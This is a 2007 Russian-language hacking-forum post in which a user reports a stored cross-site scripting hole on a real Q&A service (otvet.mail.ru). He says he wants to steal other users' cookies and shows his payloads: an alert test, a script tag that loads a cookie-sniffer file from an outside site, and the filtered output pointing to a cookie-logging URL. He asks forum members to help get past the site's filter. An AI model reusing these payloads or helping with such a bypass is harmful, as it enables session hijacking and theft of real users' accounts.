HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Активная XSS на otvet.mail.ru!!!
  #1  
Старый 11.01.2007, 11:42
DesignerMix
Познающий
Регистрация: 10.01.2007
Сообщений: 35
С нами: 10175402

Репутация: 34
Cool Активная XSS на otvet.mail.ru!!!

Народ!!! Я нашёл XSS на otvet.mail.ru, но для её правильной работы ваша помошь нужна. Вот в чём вся суть, когда в вопрос (ответ) на этом сервисе вставляеш
Код:
%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
то это работает, но как только я хочу спереть чужие плюшки, то мэил фильтрует ссылку на сайт на котором стоит снифак. И как только я её (ссылку) не мучал, и переводил в разные кодировки и делал свой снифе вставлял код в ответ
Код:
<scriptsrc="http://www.naxodka.net/cookie.js"></script>
. Всё равно фильтрует гад, вот результат фильтрации
Код:
<script>location.href="<noindex><a target=_blank rel=nofollow href="http://ccl.whiteacid.org/log.php?182292">http://ccl.whiteacid.org/log.php?182292"...</a></noindex></script>
. По моему эта тема интерестна всем, так давайте её раскрутим, а?!!!

Последний раз редактировалось DesignerMix; 11.01.2007 в 12:18..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Маленькая активная XSS в Infinity GB v2.0 stable _kREveDKo_ Уязвимости CMS / форумов 0 31.07.2006 23:04



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.